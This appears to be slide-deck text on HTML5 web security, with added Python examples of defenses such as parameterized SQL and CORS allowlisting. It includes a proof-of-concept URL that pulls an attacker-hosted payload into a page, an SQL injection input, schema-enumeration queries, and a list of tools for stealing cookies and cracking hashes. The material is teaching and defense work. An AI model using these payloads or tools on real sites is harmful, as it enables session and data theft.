2. Introduction to HTML5
HTML5 threat model
Vulnerabilities & Defense
Tools
Reference
3. History
HTML 1.0: 1993.6, not a standard
HTML 2.0: 1995.11, RFC 1866
HTML 3.2: 1996.1.14, W3C Recommended Standard
HTML 4.0: 1997.12.18, W3C Recommended Standard
HTML 4.01: 1999.12.24, W3C Recommended Standard
XHTML: 2000.1.20, W3C Recommended Standard
HTML5: 2008 first draft standard; 2012 W3C Candidate Recommendation
4. Features
The three aspects of HTML5
▪ Content: HTML (new tags and attributes)
▪ Presentation of content: CSS
▪ Interaction with content: JavaScript (new APIs: Drag and Drop, LocalStorage, Web Workers, etc.)
8. XSS abuse with tags and attributes
Hiding URL Code
Stealing from the storage
Injecting and Exploiting WebSQL
ClickJacking && CookieJacking
Cross Origin Request and postMessage
Client‐side File Includes
Botnet and widgets
9. In:
New tags: <button>, <video>, <audio>, <article>, <footer>, <nav>
New attributes for tags: autocomplete, autofocus, pattern (yes, a regex) for <input>
New media events
New <canvas> tag for 2D rendering
New form controls for date and time
Geolocation
New selectors
Client-side storage including localStorage, sessionStorage, and WebSQL
Out:
Presentation elements such as <font>, <center>
Presentation attributes including align, border
<frame>, <frameset>
<applet>
Old special effects: <marquee>, <bgsound>
<noscript>
10. Attack:
New XSS vectors
Bypass blacklist filters
Defense:
Add the new tags to the blacklist
Update the regex
12. DOM
window.history.back();
window.history.forward();
window.history.go();
HTML5
history.pushState()
▪ history.pushState(stateObject, title, URL);
history.replaceState()
▪ Same arguments as pushState, but it modifies the current history entry instead of adding a new one.
15. Type
LocalStorage: for long-term storage
SessionStorage: for the session of the application (lasts until the browser is closed)
Differences
Cookies: 4k
LocalStorage / SessionStorage: depends on the browser (usually 5MB)
Support
Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50
18. Attack
Get the data from the storage (cookies, passwords, etc.)
Store your XSS shellcode
No path restriction (storage is scoped only by origin, not by path)
Defense
Don't store sensitive data in local storage
Don't use local storage for session identifiers
Stick with cookies and use the HttpOnly and Secure flags
20. Database Storage
The same as Google Gears
Operate
var db = openDatabase("Database Name", "Database Version", "Database Description", "Estimated Size");
db.transaction(function (tx) {
  tx.executeSql("YOUR SQL STATEMENT HERE");
});
Type
SQLite (supported by WebKit)
21. Attack
Store shellcode
SQL injection
Defense
Be strict with SQL operations (use ? placeholders)
Encode the SQL result before displaying it
Don't store sensitive data
23. SQL Injection
Use sqlite_master
▪ SELECT name FROM sqlite_master WHERE type='table'
▪ SELECT sql FROM sqlite_master WHERE name='table_name'
▪ SELECT sqlite_version()
Select with ?
▪ executeSql("SELECT name FROM stud WHERE id=" + input_id); // False: vulnerable
▪ executeSql("SELECT name FROM stud WHERE id=?", [input_id]); // True: parameterized
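The two executeSql forms above, as an added example that is not from the slides: WebSQL is SQLite under WebKit, so Python's built-in sqlite3 module reproduces the same behaviour offline; the stud table and its rows are constructed for the demonstration.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the slide's WebSQL 'stud' table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE stud (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO stud VALUES (?, ?)",
                   [(1, "alice"), (2, "bob"), (3, "carol")])
    return db


def names_by_id_concat(db, input_id):
    """The slide's 'False' form: the user value is pasted into the SQL text,
    so it can change the structure of the query, not just the compared value."""
    rows = db.execute("SELECT name FROM stud WHERE id=" + input_id)
    return [r[0] for r in rows]


def names_by_id_param(db, input_id):
    """The slide's 'True' form: a ? placeholder sends the value separately,
    so the engine only ever compares it as data (a non-numeric id matches nothing)."""
    rows = db.execute("SELECT name FROM stud WHERE id=?", (input_id,))
    return [r[0] for r in rows]


def schema_tables(db):
    """The sqlite_master query from the slide, run by the defender to see
    exactly what an injection in the concatenated form could reach."""
    rows = db.execute("SELECT name FROM sqlite_master WHERE type='table'")
    return [r[0] for r in rows]


if __name__ == "__main__":
    db = make_db()
    print(names_by_id_concat(db, "2"))         # ['bob']
    print(names_by_id_concat(db, "0 OR 1=1"))  # every row: the query was rewritten
    print(names_by_id_param(db, "0 OR 1=1"))   # []: treated as an id that matches nothing
    print(schema_tables(db))                   # ['stud']
```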
24. Drag and drop basics
Drag Data
the drag feedback image
drag effects
Drag events:
dragstart
dragenter
dragover
dragleave
drag
drop
dragend
28. CookieJacking
Combines several techniques to steal the user's local cookies
Technology
How to read the local file: iframe + file://
How to detect the state of cookies: Clickjacking
How to send the cookies: SMB
30. Defense
Use iframe with sandbox
if (top !== window) top.location = window.location.href;
if (top != self) top.location.href = self.location.href;
33. Defense
Check the postMessage origin
Don't use innerHTML
▪ element.innerHTML = e.data; // dangerous
▪ element.textContent = e.data; // safe
Don't use eval to deal with the message
34. Cross-Origin Resource Sharing
▪ Originally Ajax calls were subject to the Same Origin Policy
▪ Site A cannot make XMLHttpRequests to Site B
▪ HTML5 makes it possible to make these cross-domain calls
▪ Site A -> Site B (the response must include a header)
▪ Access-Control-Allow-Origin: Site A (must)
▪ Access-Control-Allow-Credentials: true | false
▪ Access-Control-Expose-Headers: ...
▪ etc.
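As an added example (not from the slides), this is how Site B's server side can decide the Access-Control-* headers listed above: an allowlist of trusted origins, exact origin matching, and credentials only for an allowlisted origin. The origin name for "Site A" is assumed.

```python
from urllib.parse import urlsplit

# Constructed allowlist for the slide's "Site A -> Site B" scenario; the
# origin name is assumed. Site B (the server) grants access only to these.
TRUSTED_ORIGINS = {"https://site-a.example"}


def cors_headers(request_origin, allow_credentials=False):
    """CORS response headers Site B adds for a request carrying this Origin,
    or {} when the origin is not trusted (the browser then blocks the read)."""
    if not request_origin:
        return {}
    parts = urlsplit(request_origin)
    # Compare scheme://host[:port] exactly; a suffix or substring match would
    # accept "https://site-a.example.attacker.test" as well.
    origin = f"{parts.scheme}://{parts.netloc}".lower()
    if parts.scheme == "" or origin not in TRUSTED_ORIGINS:
        return {}
    headers = {
        # Echo the single trusted origin back (never "*" with credentials).
        "Access-Control-Allow-Origin": origin,
        # Caches must key on Origin, since the answer depends on it.
        "Vary": "Origin",
    }
    if allow_credentials:
        headers["Access-Control-Allow-Credentials"] = "true"
    return headers


def cors_headers_reflecting(request_origin):
    """The weak setting beside the corrected one: reflecting any Origin while
    allowing credentials lets every site read the user's authenticated
    responses from Site B. Shown only to contrast with cors_headers()."""
    return {"Access-Control-Allow-Origin": request_origin,
            "Access-Control-Allow-Credentials": "true"}
```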
38. Code like this:
<html><body><script>
x = new XMLHttpRequest();
x.open("GET", location.hash.substring(1));
x.onreadystatechange = function () {
  if (x.readyState == 4) {
    document.getElementById("main").innerHTML = x.responseText;
  }
};
x.send();
</script>
<div id="main"></div>
</body></html>
POC
Introducing Cross Origin Requests: http://example.com/#http://evil.site/payload.php
Contents of 'payload.php' will be included as HTML within <div id="main"></div>
New type of XSS!!
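An added example (not from the slides) of the two checks the script above is missing: only a fragment that resolves to the page's own origin should be fetched, and the response should be rendered as text rather than HTML (the textContent rule from the postMessage defense slide). It is written in Python so it runs stand-alone; in the page the equivalent check belongs in the script before x.open(...).

```python
import html
from urllib.parse import urljoin, urlsplit

PAGE_ORIGIN = "http://example.com"  # the vulnerable page's own origin, from the slide


def fragment_target(page_url):
    """Mimic location.hash.substring(1): everything after the first '#'."""
    return urlsplit(page_url).fragment


def is_same_origin_target(target, page_origin=PAGE_ORIGIN):
    """Allow the fetch only if the fragment resolves to the page's own origin.
    Relative paths resolve against the page, so '/news.html' passes, while
    absolute, protocol-relative (//host/...) and javascript: targets do not."""
    if not target:
        return False
    resolved = urlsplit(urljoin(page_origin + "/", target))
    base = urlsplit(page_origin)
    return (resolved.scheme, resolved.netloc) == (base.scheme, base.netloc)


def render_as_text(response_text):
    """Equivalent of assigning to textContent instead of innerHTML: the fetched
    bytes become literal text, so any markup in them cannot execute."""
    return html.escape(response_text, quote=True)


def include_fragment(page_url):
    """The decision the page's script should make before calling x.open(...):
    return the target to fetch, or None to refuse a cross-origin include."""
    target = fragment_target(page_url)
    if not is_same_origin_target(target):
        return None
    return target
```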
40. Web Workers
Run scripts in the background, independently of the page
Very simple
var w = new Worker("some_script.js");
w.onmessage = function (e) { /* do something */ };
w.terminate();
Access
▪ XHR, navigator object, application cache, spawning other workers!
Can't access
▪ DOM, window, document objects
41. Attack
Botnet
▪ Application‐level DDoS attacks
▪ Email Spam
▪ Distributed password cracking
Network Scanning
Guessing User’s Private IP Address
▪ Identify the user’s subnet
▪ Identify the IP address
43. HTML5CSdump
Uses the enumeration and extraction techniques described before to obtain all the client-side storage belonging to a certain domain name
JS-Recon
Port Scans
Network Scans
Detecting private IP address
44. Imposter
Steal cookies
Set cookies
Steal Local Shared Objects
Steal stored passwords from Firefox
etc
Shell of the Future
Reverse Web Shell handler
Bypass anti-session hijacking measures
45. Ravan
JavaScript-based distributed computing system
Supported hashing algorithms:
▪ MD5
▪ SHA1
▪ SHA256
▪ SHA512